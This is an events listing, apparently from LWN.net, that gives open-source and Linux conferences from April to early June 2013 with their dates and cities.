April 1-5: Scientific Software Engineering Conference (Boulder, CO, USA)
April 4-7: OsmoDevCon 2013 (Berlin, Germany)
April 4-5: Distro Recipes (Paris, France)
April 6-7: international Openmobility conference 2013 (Bratislava, Slovakia)
April 8: The CentOS Dojo 2013 (Antwerp, Belgium)
April 8-9: Write The Docs (Portland, OR, USA)
April 10-13: Libre Graphics Meeting (Madrid, Spain)
April 10-13: Evergreen ILS 2013 (Vancouver, Canada)
April 14: OpenShift Origin Community Day (Portland, OR, USA)
April 15-18: OpenStack Summit (Portland, OR, USA)
April 15-17: LF Collaboration Summit (San Francisco, CA, USA)
April 15-17: Open Networking Summit (Santa Clara, CA, USA)
April 16-18: Lustre User Group 13 (San Diego, CA, USA)
April 17-18: Open Source Data Center Conference (Nuremberg, Germany)
April 17-19: IPv6 Summit (Denver, CO, USA)
April 18-19: Linux Storage, Filesystem and MM Summit (San Francisco, CA, USA)
April 19: Puppet Camp (Nürnberg, Germany)
April 20: Grazer Linuxtage (Graz, Austria)
April 21-22: Free and Open Source Software COMmunities Meeting 2013 (Athens, Greece)
April 22-25: Percona Live MySQL Conference and Expo (Santa Clara, CA, USA)
April 26: MySQL® & Cloud Database Solutions Day (Santa Clara, CA, USA)
April 26-27: Linuxwochen Eisenstadt (Eisenstadt, Austria)
April 27-28: LinuxFest Northwest (Bellingham, WA, USA)
April 27-28: WordCamp Melbourne 2013 (Melbourne, Australia)
April 29-30: 2013 European LLVM Conference (Paris, France)
April 29-30: Open Source Business Conference (San Francisco, CA, USA)
May 1-3: DConf 2013 (Menlo Park, CA, USA)
May 2-4: Linuxwochen Wien 2013 (Wien, Austria)
May 9-12: Linux Audio Conference 2013 (Graz, Austria)
May 10: Open Source Community Summit (Washington, DC, USA)
May 10: CentOS Dojo, Phoenix (Phoenix, AZ, USA)
May 14-15: LF Enterprise End User Summit (New York, NY, USA)
May 14-17: SambaXP 2013 (Göttingen, Germany)
May 15-19: DjangoCon Europe (Warsaw, Poland)
May 16: NLUUG Spring Conference 2013 (Maarssen, Netherlands)
May 22-23: Open IT Summit (Berlin, Germany)
May 22-24: Tizen Developer Conference (San Francisco, CA, USA)
May 22-25: LinuxTag 2013 (Berlin, Germany)
May 23-24: PGCon 2013 (Ottawa, Canada)
May 24-25: GNOME.Asia Summit 2013 (Seoul, Korea)
May 27-28: Automotive Linux Summit (Tokyo, Japan)
May 28-29: Solutions Linux, Libres et Open Source (Paris, France)
May 29-31: Linuxcon Japan 2013 (Tokyo, Japan)
May 30: Prague PostgreSQL Developers Day (Prague, Czech Republic)
May 31-June 1: Texas Linux Festival 2013 (Austin, TX, USA)
June 1-2: Debian/Ubuntu Community Conference Italia 2013 (Fermo, Italy)
June 1-4: European Lisp Symposium (Madrid, Spain)

If your event does not appear here, please tell us about it.

Page editor: Rebecca Sobol


Copyright © 2013, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds